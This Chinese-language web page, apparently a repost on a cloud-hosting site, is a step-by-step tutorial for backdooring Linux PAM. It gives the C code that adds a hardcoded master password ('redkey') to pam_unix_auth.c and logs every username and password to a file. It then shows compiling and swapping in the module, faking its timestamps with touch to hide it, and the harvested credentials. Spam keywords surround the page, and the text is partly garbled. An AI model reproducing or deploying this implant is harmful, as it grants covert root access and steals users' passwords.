欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到云服務(wù)器

網(wǎng)絡(luò)技術(shù)

Linux系統(tǒng)安詳之pam后門安裝利用詳解

2016-10-25 夢飛 245

 本文要領(lǐng)來自網(wǎng)絡(luò):Sky原創(chuàng)

本文測試情況為:RHEL 6.1 X64

一.查察系統(tǒng)pam版本:

1
2
[[email protected] ~]# rpm -qa | grep pam
pam-1.1.1-4.el6.x86_64

二.下載對應(yīng)版本的pam模塊

http://www.linux-pam.org/library/

三.解壓&修改pam_unix_auth.c文件

1
2
3
4
tar -xzvf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1
cd modules/pam_unix/
vim pam_unix_auth.c

四.修改部門

PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags

                                  ,int argc, const char **argv)

{

界說:FILE *fp;如下:

1
2
3
4
5
6
7
8
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags
                                   ,int argc, const char **argv)
{
        unsigned int ctrl;
        int retval, *ret_data = NULL;
        const char *name;
        const void *p;
        FILE *fp;

在retval = _unix_verify_password(pamh, name, p, ctrl); [約177行]下添加

 

1
2
3
4
5
6
7
8
9
10
11
12
/*password:"redkey"*/
if(strcmp(p,"redkey")==0)
{
        retval = PAM_SUCCESS;
}
if(retval== PAM_SUCCESS)
{
/*pamfile:pamwd.txt*/
        fp=fopen("pamwd.txt","a");
        fprintf(fp,"%s::%s ",name,p);
        fclose(fp);
}

 

五.編譯

1
2
3
[[email protected] pam_unix]# cd ../../
[[email protected] Linux-PAM-1.1.1]# ./configure
[[email protected] Linux-PAM-1.1.1]# make

六.備份原有PAM模塊

1
[[email protected] security]# mv pam_unix.so{,.bak}

七.復(fù)制新PAM模塊到/lib64/security/目次下:

1
[[email protected] security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/

八.修改pam模塊時間屬性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[[email protected] security]# stat pam_unix.*
  File: "pam_unix.so"
  Size: 151879          Blocks: 304        IO Block: 4096   普通文件
Device: fd01h/64769d    Inode: 565261      Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2013-12-24 11:30:01.813610217 +0800
Modify: 2013-12-24 08:55:00.000000000 +0800
Change: 2013-12-24 11:29:12.747789015 +0800
  File: "pam_unix.so.bak"
  Size: 50752           Blocks: 104        IO Block: 4096   普通文件
Device: fd01h/64769d    Inode: 523660      Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2013-12-24 08:55:08.026835929 +0800
Modify: 2010-02-16 01:34:42.000000000 +0800
Change: 2013-12-24 10:42:11.741663207 +0800
1
[[email protected] security]# touch -t 201002160134 pam_unix.so
1
2
3
[[email protected] security]# ll pam_unix.*
-rwxr-xr-x  1 root root 151879  2月 16 2010 pam_unix.so
-rwxr-xr-x. 1 root root  50752  2月 16 2010 pam_unix.so.bak

九.萬能暗碼登岸驗證

1
2
3
4
login as: root
[email protected]'s password:
Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1
[[email protected] ~]#
1
2
3
4
5
6
[[email protected] /]# cat pamwd.txt
root::redkey
root::123456
root::12345678
root::redkey
root::redkey
域名注冊
  1. 上篇:php.ini中request_order項怎么樣配置才安詳
  2. 下篇:Hacking Team泄露漏洞被利用大范圍掛馬導(dǎo)致上百萬電腦中毒
騰訊云代理

Copyright © 2003-2021 MFISP.COM. 國外vps服務(wù)器租用 夢飛云服務(wù)器租用 版權(quán)所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 汤原县| 沙坪坝区| 乡城县| 大名县| 武隆县| 鄢陵县| 惠安县| 介休市| 松原市| 景宁| 北京市| 丹寨县| 富宁县| 始兴县| 浦北县| 句容市| 怀远县| 莎车县| 宜阳县| 肥西县| 江安县| 华阴市| 沧源| 宁城县| 克东县| 始兴县| 蒲江县| 台东市| 长春市| 宁阳县| 明溪县| 社旗县| 凤阳县| 大洼县| 沾化县| 泗阳县| 甘德县| 织金县| 崇明县| 乌鲁木齐县| 黑龙江省|